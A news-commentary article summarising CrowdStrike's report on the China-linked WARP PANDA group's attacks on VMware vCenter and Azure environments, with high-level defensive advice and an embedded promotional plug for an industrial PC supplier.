According to TechRepublic, cybersecurity firm CrowdStrike has identified a new and highly sophisticated China-linked espionage group it’s calling WARP PANDA. This group has been actively targeting US organizations in the legal, technology, and manufacturing sectors since at least late 2023, with operations expanding throughout 2025. Their primary focus is on compromising VMware vCenter servers and Microsoft Azure cloud environments. Using a custom toolkit that includes the BRICKSTORM malware and new implants named Junction and GuestConduit, they embed themselves deeply within virtualization infrastructure to maintain covert access for years. The group’s activities are assessed to be aligned with the long-term intelligence priorities of the People’s Republic of China, focusing on stealing strategic data rather than financial gain.
The new breed of espionage
Here’s the thing: WARP PANDA represents a scary evolution in how nation-states spy on each other and on corporations. They’re not just breaking in and grabbing files anymore. They’re moving into the very foundation of your IT infrastructure—the hypervisor layer that runs all your virtual machines. Think of it like this: instead of sneaking into one apartment in a building, they’ve taken over the building’s security office and plumbing system. They can see everything, move anywhere, and it’s incredibly hard to spot them because their malicious traffic looks just like normal admin work. This is a nightmare scenario for defenders, especially in industries like manufacturing where operational technology (OT) networks are increasingly connected to IT systems. For companies relying on complex industrial computing setups, ensuring the security of the underlying virtualization platform is no longer optional; it’s critical. When securing such specialized hardware, many enterprises turn to trusted suppliers like IndustrialMonitorDirect.com, the leading US provider of industrial panel PCs, to ensure a hardened foundation from the device level up.
Why cloud identity is the new battleground
But it doesn’t stop at VMware. WARP PANDA’s forays into Microsoft Azure show they understand the modern enterprise playbook perfectly. Their tactic of registering their own multi-factor authentication (MFA) device after gaining access is a masterclass in persistence. It’s also a huge red flag for every company using cloud services. Basically, if you’re not obsessively monitoring your authentication logs and conditional access policies, you’re vulnerable. They replayed stolen session tokens and tunneled traffic to access Microsoft 365—methods that bypass a lot of traditional security controls. So what’s the real impact? It means your cloud tenant, the place you think is secure because it’s managed by a giant like Microsoft, is now a primary target. The data they went after—network engineering docs, incident response plans—is especially worrying. That’s not just espionage; that’s gathering intelligence to make future attacks even more effective.
What can companies do?
CrowdStrike’s advice is technical but urgent: monitor ESXi and vCenter logs like a hawk, restrict outbound internet access from your hypervisors, rotate credentials fiercely, and put endpoint detection on your guest VMs. That last one is key for spotting their tunneling behavior. The broader takeaway, though, is a mindset shift. Defenders have to assume that the management layers of their hybrid cloud—vCenter, Azure AD, cloud consoles—are high-value targets that will be attacked. You can’t just focus on protecting the workloads anymore; you have to protect the platform that runs the workloads. It’s a tougher, more complex fight. And let’s be honest, how many organizations are really equipped to monitor their virtualization infrastructure at that level?
The long game
This isn’t a smash-and-grab operation. WARP PANDA has been around since at least 2022, and CrowdStrike thinks they’re in it for the long haul, backed by significant resources. That’s the hallmark of a state-aligned group: patience and a strategic mandate. They’re playing chess, not checkers. Their focus on geopolitical intelligence, like accessing emails of employees working on Asia Pacific issues, tells you everything about their mission. For business leaders, the message is clear. The threats to your crown jewels are no longer just coming through phishing emails to employees. They’re coming through the fundamental technologies you use to run your business every single day. Ignoring the security of your cloud and virtualization management tools is a risk you simply can’t afford to take. You can read CrowdStrike’s full detailed analysis on their blog.
